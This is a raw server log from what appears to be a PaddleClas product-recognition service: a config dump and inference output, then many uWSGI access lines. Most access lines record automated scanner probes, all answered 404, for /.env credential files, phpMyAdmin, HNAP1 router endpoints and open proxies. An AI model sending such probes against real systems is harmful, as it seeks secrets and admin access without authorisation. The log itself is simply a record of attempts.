INFO: DetResize : +2022-02-18 08:42:06 INFO: interp : 2 +2022-02-18 08:42:06 INFO: keep_ratio : False +2022-02-18 08:42:06 INFO: target_size : [640, 640] +2022-02-18 08:42:06 INFO: DetNormalizeImage : +2022-02-18 08:42:06 INFO: is_scale : True +2022-02-18 08:42:06 INFO: mean : [0.485, 0.456, 0.406] +2022-02-18 08:42:06 INFO: std : [0.229, 0.224, 0.225] +2022-02-18 08:42:06 INFO: DetPermute : +2022-02-18 08:42:06 INFO: Global : +2022-02-18 08:42:06 INFO: batch_size : 1 +2022-02-18 08:42:06 INFO: cpu_num_threads : 1 +2022-02-18 08:42:06 INFO: det_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/picodet_PPLCNet_x2_5_mainbody_lite_v1.0_infer +2022-02-18 08:42:06 INFO: enable_benchmark : True +2022-02-18 08:42:06 INFO: enable_mkldnn : True +2022-02-18 08:42:06 INFO: enable_profile : False +2022-02-18 08:42:06 INFO: gpu_mem : 8000 +2022-02-18 08:42:06 INFO: image_shape : [3, 640, 640] +2022-02-18 08:42:06 INFO: infer_imgs : /root/Smart_container/PaddleClas/dataset/test_pic/test_client.jpg +2022-02-18 08:42:06 INFO: ir_optim : True +2022-02-18 08:42:06 INFO: labe_list : ['foreground'] +2022-02-18 08:42:06 INFO: max_det_results : 5 +2022-02-18 08:42:06 INFO: rec_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/general_PPLCNet_x2_5_lite_v1.0_infer +2022-02-18 08:42:06 INFO: rec_nms_thresold : 0.05 +2022-02-18 08:42:06 INFO: threshold : 0.2 +2022-02-18 08:42:06 INFO: use_fp16 : False +2022-02-18 08:42:06 INFO: use_gpu : False +2022-02-18 08:42:06 INFO: use_tensorrt : False +2022-02-18 08:42:06 INFO: IndexProcess : +2022-02-18 08:42:06 INFO: index_dir : /root/Smart_container/PaddleClas/dataset/retail/index_update +2022-02-18 08:42:06 INFO: return_k : 5 +2022-02-18 08:42:06 INFO: score_thres : 0.5 +2022-02-18 08:42:06 INFO: RecPostProcess : None +2022-02-18 08:42:06 INFO: RecPreProcess : +2022-02-18 08:42:06 INFO: transform_ops : +2022-02-18 08:42:06 INFO: ResizeImage : +2022-02-18 08:42:06 INFO: size : 224 +2022-02-18 08:42:06 INFO: NormalizeImage : +2022-02-18 08:42:06 INFO: mean : [0.485, 0.456, 0.406] +2022-02-18 08:42:06 INFO: order : +2022-02-18 08:42:06 INFO: scale : 0.00392157 +2022-02-18 08:42:06 INFO: std : [0.229, 0.224, 0.225] +2022-02-18 08:42:06 INFO: ToCHWImage : None +Inference: 377.31361389160156 ms per batch image +[] +234 +["Please connect root to upload container's name and it's price!\n"] +[pid: 19148|app: 0|req: 1627/1895] 223.167.141.7 () {34 vars in 448 bytes} [Fri Feb 18 08:42:05 2022] POST /reference_client/ => generated 98 bytes in 2968 msecs (HTTP/1.1 200) 5 headers in 157 bytes (17 switches on core 0) +[pid: 19148|app: 0|req: 1628/1896] 39.103.163.202 () {22 vars in 235 bytes} [Fri Feb 18 09:46:26 2022] GET / => generated 179 bytes in 2 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1629/1897] 39.103.163.202 () {22 vars in 297 bytes} [Fri Feb 18 09:46:31 2022] GET /nice%20ports%2C/Tri%6Eity.txt%2ebak => generated 179 bytes in 2 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1630/1898] 39.103.163.202 () {22 vars in 239 bytes} [Fri Feb 18 09:46:39 2022] OPTIONS / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1631/1899] 39.103.163.202 () {22 vars in 239 bytes} [Fri Feb 18 09:46:43 2022] OPTIONS / => generated 179 bytes in 1 msecs (RTSP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1632/1900] 39.103.163.202 () {40 vars in 485 bytes} [Fri Feb 18 09:46:48 2022] OPTIONS sip:nm => generated 179 bytes in 1 msecs (SIP/2.0 404) 5 headers in 157 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1633/1901] 83.97.20.34 () {30 vars in 329 bytes} [Fri Feb 18 10:03:24 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1634/1902] 35.195.93.98 () {42 vars in 563 bytes} [Fri Feb 18 10:30:40 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1635/1903] 81.17.24.154 () {40 vars in 627 bytes} [Fri Feb 18 11:18:13 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1636/1904] 83.97.20.34 () {26 vars in 287 bytes} [Fri Feb 18 11:55:10 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1637/1905] 180.178.93.157 () {32 vars in 464 bytes} [Fri Feb 18 12:43:52 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1638/1906] 1.13.189.96 () {34 vars in 367 bytes} [Fri Feb 18 12:45:28 2022] GET / => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1639/1907] 1.13.189.96 () {34 vars in 367 bytes} [Fri Feb 18 13:35:00 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1640/1908] 39.103.166.103 () {32 vars in 503 bytes} [Fri Feb 18 13:56:43 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1641/1909] 38.242.212.192 () {40 vars in 568 bytes} [Fri Feb 18 14:20:57 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1642/1910] 47.99.44.18 () {30 vars in 363 bytes} [Fri Feb 18 15:24:53 2022] GET /phpmyadmin/index.php => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 118/1911] 47.99.44.18 () {42 vars in 885 bytes} [Fri Feb 18 15:24:53 2022] GET /phpmyadmin/index.php => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1643/1912] 217.146.82.20 () {32 vars in 468 bytes} [Fri Feb 18 15:27:56 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1644/1913] 23.99.198.33 () {36 vars in 588 bytes} [Fri Feb 18 15:36:57 2022] GET /.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 119/1914] 23.99.198.33 () {40 vars in 695 bytes} [Fri Feb 18 15:36:57 2022] POST / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1645/1915] 14.207.60.195 () {32 vars in 464 bytes} [Fri Feb 18 15:45:39 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1646/1916] 81.17.24.154 () {40 vars in 627 bytes} [Fri Feb 18 15:51:59 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1647/1917] 83.97.20.34 () {30 vars in 329 bytes} [Fri Feb 18 15:55:19 2022] GET / => generated 179 bytes in 2 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1648/1918] 167.248.133.120 () {28 vars in 312 bytes} [Fri Feb 18 16:08:56 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1649/1919] 167.248.133.120 () {34 vars in 444 bytes} [Fri Feb 18 16:08:57 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1650/1920] 83.97.20.34 () {26 vars in 287 bytes} [Fri Feb 18 17:39:47 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1651/1921] 112.124.106.120 () {34 vars in 459 bytes} [Fri Feb 18 18:30:50 2022] GET /hunmj_serverApi/test.php => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1652/1922] 46.40.34.137 () {32 vars in 463 bytes} [Fri Feb 18 18:50:38 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1653/1923] 47.105.152.112 () {36 vars in 660 bytes} [Fri Feb 18 20:36:33 2022] GET /phpmyadmin/index.php => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1654/1924] 47.105.152.112 () {36 vars in 646 bytes} [Fri Feb 18 20:36:33 2022] GET /pmd/index.php => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1655/1925] 47.105.152.112 () {36 vars in 646 bytes} [Fri Feb 18 20:36:33 2022] GET /pmd/index.php => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1656/1926] 45.143.144.187 () {36 vars in 524 bytes} [Fri Feb 18 20:59:46 2022] GET /.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1657/1927] 45.143.144.187 () {40 vars in 631 bytes} [Fri Feb 18 20:59:47 2022] POST / => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1658/1928] 23.99.198.33 () {36 vars in 588 bytes} [Fri Feb 18 21:06:54 2022] GET /.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1659/1929] 23.99.198.33 () {40 vars in 695 bytes} [Fri Feb 18 21:06:55 2022] POST / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1660/1930] 78.109.192.19 () {32 vars in 463 bytes} [Fri Feb 18 21:10:32 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1661/1931] 81.17.24.154 () {40 vars in 627 bytes} [Fri Feb 18 21:12:42 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[uwsgi-http key: client_addr: 31.44.185.123 client_port: 7419] hr_read(): Connection reset by peer [plugins/http/http.c line 918] +[pid: 19148|app: 0|req: 1662/1932] 83.97.20.34 () {30 vars in 329 bytes} [Fri Feb 18 21:44:08 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1663/1933] 194.49.68.118 () {36 vars in 523 bytes} [Fri Feb 18 23:04:58 2022] GET /.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1664/1934] 194.49.68.118 () {40 vars in 630 bytes} [Fri Feb 18 23:04:59 2022] POST / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1665/1935] 209.17.97.2 () {30 vars in 408 bytes} [Fri Feb 18 23:51:53 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1666/1936] 83.97.20.34 () {26 vars in 287 bytes} [Fri Feb 18 23:52:30 2022] GET / => generated 179 bytes in 2 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1667/1937] 91.207.244.204 () {32 vars in 464 bytes} [Sat Feb 19 00:53:48 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[uwsgi-http key: client_addr: 31.44.185.123 client_port: 7419] hr_read(): Connection reset by peer [plugins/http/http.c line 918] +[pid: 19148|app: 0|req: 1668/1938] 69.164.222.170 () {34 vars in 394 bytes} [Sat Feb 19 01:43:10 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1669/1939] 47.101.190.233 () {34 vars in 460 bytes} [Sat Feb 19 01:53:59 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1670/1940] 5.239.151.91 () {32 vars in 469 bytes} [Sat Feb 19 02:23:00 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 120/1941] 39.98.125.176 () {32 vars in 409 bytes} [Sat Feb 19 02:35:42 2022] GET /text4041645238142 => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1671/1942] 39.98.125.176 () {34 vars in 411 bytes} [Sat Feb 19 02:35:42 2022] POST /sdk => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19146|app: 0|req: 57/1943] 39.98.125.176 () {32 vars in 395 bytes} [Sat Feb 19 02:35:42 2022] GET /evox/about => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1672/1944] 39.98.125.176 () {32 vars in 385 bytes} [Sat Feb 19 02:35:42 2022] GET /HNAP1 => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19146|app: 0|req: 58/1945] 39.98.125.176 () {28 vars in 307 bytes} [Sat Feb 19 02:35:43 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19145|app: 0|req: 28/1946] 39.98.125.176 () {36 vars in 463 bytes} [Sat Feb 19 02:35:53 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19144|app: 0|req: 27/1947] 39.98.125.176 () {34 vars in 414 bytes} [Sat Feb 19 02:35:53 2022] GET /favicon.ico => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1673/1948] 103.48.71.250 () {32 vars in 464 bytes} [Sat Feb 19 02:42:54 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1674/1949] 81.17.24.154 () {40 vars in 627 bytes} [Sat Feb 19 03:18:05 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1675/1950] 89.248.165.245 () {36 vars in 563 bytes} [Sat Feb 19 03:23:33 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1676/1951] 83.97.20.34 () {30 vars in 329 bytes} [Sat Feb 19 03:29:31 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1677/1952] 107.189.6.200 () {28 vars in 310 bytes} [Sat Feb 19 04:09:33 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1678/1953] 107.189.6.200 () {40 vars in 669 bytes} [Sat Feb 19 04:09:34 2022] POST /HNAP1/ => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1679/1954] 222.186.19.235 () {30 vars in 521 bytes} [Sat Feb 19 05:01:34 2022] GET http://fuwu.sogou.com/404/index.html => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 121/1955] 222.186.19.235 () {30 vars in 508 bytes} [Sat Feb 19 05:01:34 2022] GET http://fuwu.sogou.com/404/index.html => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1680/1956] 83.97.20.34 () {26 vars in 287 bytes} [Sat Feb 19 05:24:39 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1681/1957] 103.207.42.178 () {36 vars in 590 bytes} [Sat Feb 19 05:32:45 2022] GET /.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1682/1958] 103.207.42.178 () {40 vars in 697 bytes} [Sat Feb 19 05:32:49 2022] POST / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1683/1959] 45.134.225.16 () {40 vars in 628 bytes} [Sat Feb 19 05:51:28 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1684/1960] 128.14.134.170 () {34 vars in 488 bytes} [Sat Feb 19 06:56:27 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1685/1961] 107.189.5.162 () {28 vars in 310 bytes} [Sat Feb 19 07:45:49 2022] GET / => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1686/1962] 107.189.5.162 () {40 vars in 669 bytes} [Sat Feb 19 07:45:49 2022] POST /HNAP1/ => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1687/1963] 192.241.213.133 () {34 vars in 425 bytes} [Sat Feb 19 08:59:29 2022] GET /actuator/health => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1688/1964] 83.97.20.34 () {30 vars in 329 bytes} [Sat Feb 19 10:04:41 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1689/1965] 130.211.54.158 () {42 vars in 563 bytes} [Sat Feb 19 10:10:14 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1690/1966] 185.173.35.53 () {30 vars in 451 bytes} [Sat Feb 19 11:01:01 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1691/1967] 160.20.202.103 () {32 vars in 471 bytes} [Sat Feb 19 11:48:06 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1692/1968] 184.105.247.196 () {28 vars in 309 bytes} [Sat Feb 19 12:08:21 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1693/1969] 106.75.218.250 () {30 vars in 329 bytes} [Sat Feb 19 12:52:34 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1694/1970] 103.203.56.1 () {32 vars in 398 bytes} [Sat Feb 19 12:58:32 2022] GET / => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[uwsgi-http key: client_addr: 31.44.185.123 client_port: 7419] hr_read(): Connection reset by peer [plugins/http/http.c line 918] +[pid: 19148|app: 0|req: 1695/1971] 188.253.34.249 () {32 vars in 471 bytes} [Sat Feb 19 13:07:53 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1696/1972] 38.242.212.192 () {40 vars in 568 bytes} [Sat Feb 19 13:49:31 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1697/1973] 124.89.90.53 () {32 vars in 476 bytes} [Sat Feb 19 14:00:49 2022] GET http://wujieliulan.com/ => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19145|app: 0|req: 29/1974] 124.89.90.53 () {32 vars in 476 bytes} [Sat Feb 19 14:00:49 2022] GET http://www.minghui.org/ => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19145|app: 0|req: 30/1975] 124.89.90.53 () {32 vars in 485 bytes} [Sat Feb 19 14:00:49 2022] GET http://www.epochtimes.com/ => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1698/1976] 124.89.90.53 () {32 vars in 470 bytes} [Sat Feb 19 14:00:49 2022] GET http://www.boxun.com/ => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1699/1977] 124.89.90.53 () {22 vars in 273 bytes} [Sat Feb 19 14:00:49 2022] CONNECT www.voanews.com:443 => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1700/1978] 124.89.90.53 () {32 vars in 467 bytes} [Sat Feb 19 14:00:49 2022] GET http://www.bing.com/ => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1701/1979] 124.89.90.53 () {32 vars in 473 bytes} [Sat Feb 19 14:00:49 2022] GET http://www.123cha.com/ => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1702/1980] 124.89.90.53 () {32 vars in 470 bytes} [Sat Feb 19 14:00:49 2022] GET http://www.baidu.com/ => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1703/1981] 124.89.90.53 () {32 vars in 464 bytes} [Sat Feb 19 14:00:54 2022] GET http://www.rfa.org/ => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1704/1982] 129.232.212.130 () {36 vars in 525 bytes} [Sat Feb 19 14:25:56 2022] GET /.env => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1705/1983] 129.232.212.130 () {40 vars in 632 bytes} [Sat Feb 19 14:25:57 2022] POST / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1706/1984] 124.121.127.217 () {34 vars in 517 bytes} [Sat Feb 19 14:50:18 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1707/1985] 124.121.127.217 () {34 vars in 524 bytes} [Sat Feb 19 14:50:18 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1708/1986] 124.121.127.217 () {34 vars in 518 bytes} [Sat Feb 19 14:50:18 2022] GET / => generated 179 bytes in 0 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1709/1987] 83.97.20.34 () {30 vars in 329 bytes} [Sat Feb 19 15:35:41 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1710/1988] 151.238.10.209 () {32 vars in 471 bytes} [Sat Feb 19 17:09:13 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1711/1989] 151.238.10.209 () {32 vars in 465 bytes} [Sat Feb 19 17:09:17 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[uwsgi-http key: client_addr: 167.94.138.46 client_port: 49344] hr_read(): Connection reset by peer [plugins/http/http.c line 918] +[pid: 19148|app: 0|req: 1712/1990] 167.94.138.46 () {24 vars in 264 bytes} [Sat Feb 19 17:16:43 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1713/1991] 167.94.138.46 () {30 vars in 400 bytes} [Sat Feb 19 17:16:43 2022] GET / => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1714/1992] 167.94.138.46 () {22 vars in 234 bytes} [Sat Feb 19 17:16:44 2022] PRI * => generated 179 bytes in 1 msecs (HTTP/2.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1715/1993] 83.97.20.34 () {26 vars in 287 bytes} [Sat Feb 19 17:25:43 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1716/1994] 178.32.197.92 () {36 vars in 542 bytes} [Sat Feb 19 17:28:26 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1717/1995] 193.118.53.202 () {34 vars in 488 bytes} [Sat Feb 19 17:58:10 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1718/1996] 188.165.87.102 () {36 vars in 565 bytes} [Sat Feb 19 18:30:04 2022] GET /favicon.ico => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1719/1997] 187.85.6.45 () {32 vars in 468 bytes} [Sat Feb 19 18:43:56 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 122/1998] 209.17.97.114 () {30 vars in 410 bytes} [Sat Feb 19 19:16:21 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1720/1999] 190.109.170.21 () {32 vars in 465 bytes} [Sat Feb 19 19:44:14 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1721/2000] 83.97.20.34 () {30 vars in 329 bytes} [Sat Feb 19 21:48:12 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1722/2001] 77.89.199.238 () {32 vars in 463 bytes} [Sat Feb 19 23:04:25 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1723/2002] 83.97.20.34 () {26 vars in 287 bytes} [Sat Feb 19 23:18:16 2022] GET / => generated 179 bytes in 2 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1724/2003] 47.102.140.179 () {34 vars in 460 bytes} [Sun Feb 20 00:26:54 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1725/2004] 192.241.201.126 () {34 vars in 419 bytes} [Sun Feb 20 00:36:14 2022] GET /ReportServer => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1726/2005] 1.13.189.96 () {34 vars in 367 bytes} [Sun Feb 20 01:20:54 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 